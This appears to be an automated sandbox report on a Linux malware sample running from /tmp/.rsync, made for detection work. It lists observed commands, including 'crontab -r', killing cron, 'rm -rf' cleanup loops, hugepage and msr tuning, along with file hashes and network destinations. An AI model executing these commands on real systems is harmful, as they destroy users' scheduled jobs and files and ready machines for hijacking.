[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
Network
Files
Analysis: behavioral31
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
ubuntu2204-amd64-20240611-en
Max time kernel
0s
Max time network
132s
Command Line
Signatures
Processes
/tmp/.rsync/c/lib/64/libc.so.6
[/tmp/.rsync/c/lib/64/libc.so.6]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-mipsel-20240611-en
Max time kernel
11s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/a/dir.dir | /tmp/.rsync/a/run | N/A |
| File opened for modification | /tmp/.rsync/a/bash.pid | /tmp/.rsync/a/run | N/A |
Processes
/tmp/.rsync/a/run
[/tmp/.rsync/a/run]
/tmp/.rsync/a/stop
[./stop]
/bin/sleep
[sleep 10]
/bin/cat
[cat dir.dir]
/bin/uname
[uname -m]
Network
Files
/tmp/.rsync/a/dir.dir
| MD5 | b3d878adcf4672bbd1f31cffac10c769 |
| SHA1 | ce5798837933ece35a7e26a0a3dc06cab19c6275 |
| SHA256 | ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7 |
| SHA512 | 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c |
/tmp/.rsync/a/bash.pid
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
Analysis: behavioral20
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-armhf-20240418-en
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/.rsync/c/golan
[/tmp/.rsync/c/golan]
Network
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
Processes
/tmp/.rsync/c/lib/32/libdl.so.2
[/tmp/.rsync/c/lib/32/libdl.so.2]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
10s
Max time network
129s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/.rsync/a/upd | /tmp/.rsync/a/upd | N/A |
Loads a kernel module
| Description | Indicator | Process | Target |
| N/A | /lib/modules/4.15.0-213-generic/kernel/arch/x86/kernel/msr.ko | /sbin/modprobe | N/A |
Enumerates running processes
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/node | /tmp/.rsync/a/a | N/A |
| File opened for reading | /sys/module/msr/initstate | /sbin/modprobe | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/1504/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/34/status | /bin/ps | N/A |
| File opened for reading | /proc/581/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1169/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/460/status | /bin/ps | N/A |
| File opened for reading | /proc/547/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/581/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/84/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/972/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/581/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/962/status | /bin/ps | N/A |
| File opened for reading | /proc/962/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/15/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/972/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/177/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/517/stat | /bin/ps | N/A |
| File opened for reading | /proc/1142/stat | /bin/ps | N/A |
| File opened for reading | /proc/1502/stat | /bin/ps | N/A |
| File opened for reading | /proc/1073/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/16/status | /bin/ps | N/A |
| File opened for reading | /proc/1301/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/170/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1084/stat | /bin/ps | N/A |
| File opened for reading | /proc/250/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/280/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1291/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/28/stat | /bin/ps | N/A |
| File opened for reading | /proc/1318/stat | /bin/ps | N/A |
| File opened for reading | /proc/446/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1197/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/172/stat | /bin/ps | N/A |
| File opened for reading | /proc/21/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/475/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/15/status | /bin/ps | N/A |
| File opened for reading | /proc/1197/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/26/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1060/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1343/stat | /bin/ps | N/A |
| File opened for reading | /proc/1379/status | /bin/ps | N/A |
| File opened for reading | /proc/323/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1192/status | /bin/ps | N/A |
| File opened for reading | /proc/215/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/1/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/26/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1169/status | /bin/ps | N/A |
| File opened for reading | /proc/11/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/185/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/85/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/21/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1146/stat | /bin/ps | N/A |
| File opened for reading | /proc/1188/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1197/stat | /bin/ps | N/A |
| File opened for reading | /proc/1189/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/25/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/683/stat | /bin/ps | N/A |
| File opened for reading | /proc/2/stat | /bin/ps | N/A |
| File opened for reading | /proc/15/stat | /bin/ps | N/A |
| File opened for reading | /proc/82/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/467/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1273/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/184/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1531/stat | /bin/ps | N/A |
| File opened for reading | /proc/1288/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1503/status | /usr/bin/pkill | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/a/upd | /tmp/.rsync/a/a | N/A |
| File opened for modification | /tmp/.rsync/a/.proc | /tmp/.rsync/a/stop | N/A |
| File opened for modification | /tmp/.rsync/a/dir.dir | /tmp/.rsync/a/run | N/A |
| File opened for modification | /tmp/.rsync/a/bash.pid | /tmp/.rsync/a/run | N/A |
| File opened for modification | /tmp/.rsync/a/dir.dir | /tmp/.rsync/a/a | N/A |
Processes
/tmp/.rsync/a/a
[/tmp/.rsync/a/a]
/usr/bin/crontab
[crontab -r]
/bin/cat
[cat dir.dir]
/usr/bin/nproc
[nproc]
/sbin/sysctl
[sysctl -w vm.nr_hugepages=1]
/usr/bin/find
[find /sys/devices/system/node/node0 -maxdepth 0 -type d]
/sbin/modprobe
[modprobe msr]
/bin/grep
[grep AMD Ryzen]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep Intel]
/bin/cat
[cat /proc/cpuinfo]
/bin/chmod
[chmod u+x upd]
/bin/chmod
[chmod 777 a anacron cron dir.dir run stop upd]
/tmp/.rsync/a/upd
[./upd]
/tmp/.rsync/a/run
[./run]
/tmp/.rsync/a/stop
[./stop]
/usr/bin/pkill
[pkill -9 cron]
/usr/bin/killall
[killall -9 cron]
/usr/bin/awk
[awk {print $1}]
/bin/grep
[grep -v grep]
/bin/grep
[grep cron]
/bin/ps
[ps x]
/bin/rm
[rm -rf .proc]
/bin/sleep
[sleep 10]
/bin/cat
[cat dir.dir]
/bin/uname
[uname -m]
/tmp/.rsync/a/cron
[./cron]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| GB | 89.187.167.5:443 | tcp |
Files
/tmp/.rsync/a/dir.dir
| MD5 | b3d878adcf4672bbd1f31cffac10c769 |
| SHA1 | ce5798837933ece35a7e26a0a3dc06cab19c6275 |
| SHA256 | ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7 |
| SHA512 | 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c |
/tmp/.rsync/a/upd
| MD5 | a136fbe534c2487d3c89bd6a26847bd0 |
| SHA1 | 11b9362ba79b67dd5d5baf7cf11e0003f049d6e0 |
| SHA256 | 419a443ff93475ef3abb6e71e5a94e56aea8b7c1f1c4402b3662425815432d46 |
| SHA512 | 85047cf9d22037d2581ae41275107b243c0bb3259b57fe46bd3fd04a1abe75a7fdeace8a9eae1fae31349a00183206b40259ab3957db8f4f16a79e67133485e9 |
/tmp/.rsync/a/bash.pid
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
Analysis: behavioral6
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
ubuntu2204-amd64-20240611-en
Max time kernel
0s
Max time network
132s
Command Line
Signatures
Processes
/tmp/.rsync/a/cron
[/tmp/.rsync/a/cron]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-mipsbe-20240418-en
Max time kernel
11s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/a/dir.dir | /tmp/.rsync/a/run | N/A |
| File opened for modification | /tmp/.rsync/a/bash.pid | /tmp/.rsync/a/run | N/A |
Processes
/tmp/.rsync/a/run
[/tmp/.rsync/a/run]
/tmp/.rsync/a/stop
[./stop]
/bin/sleep
[sleep 10]
/bin/cat
[cat dir.dir]
/bin/uname
[uname -m]
Network
Files
/tmp/.rsync/a/dir.dir
| MD5 | b3d878adcf4672bbd1f31cffac10c769 |
| SHA1 | ce5798837933ece35a7e26a0a3dc06cab19c6275 |
| SHA256 | ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7 |
| SHA512 | 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c |
/tmp/.rsync/a/bash.pid
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
Analysis: behavioral12
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-armhf-20240611-en
Max time kernel
1s
Command Line
Signatures
Enumerates running processes
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/310/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/601/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/13/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/ps | N/A |
| File opened for reading | /proc/279/stat | /bin/ps | N/A |
| File opened for reading | /proc/596/status | /bin/ps | N/A |
| File opened for reading | /proc/21/status | /bin/ps | N/A |
| File opened for reading | /proc/310/stat | /bin/ps | N/A |
| File opened for reading | /proc/22/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/599/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/19/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/674/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/10/stat | /bin/ps | N/A |
| File opened for reading | /proc/20/status | /bin/ps | N/A |
| File opened for reading | /proc/18/status | /bin/ps | N/A |
| File opened for reading | /proc/74/status | /bin/ps | N/A |
| File opened for reading | /proc/145/status | /bin/ps | N/A |
| File opened for reading | /proc/147/stat | /bin/ps | N/A |
| File opened for reading | /proc/668/status | /bin/ps | N/A |
| File opened for reading | /proc/147/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/27/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/12/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/137/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/10/status | /bin/ps | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /usr/bin/pkill | N/A |
| File opened for reading | /proc/602/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/664/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/5/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/107/stat | /bin/ps | N/A |
| File opened for reading | /proc/140/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/13/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/596/stat | /bin/ps | N/A |
| File opened for reading | /proc/674/stat | /bin/ps | N/A |
| File opened for reading | /proc/19/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/281/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/599/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/14/stat | /bin/ps | N/A |
| File opened for reading | /proc/29/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/644/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/279/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/25/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/74/stat | /usr/bin/killall | N/A |
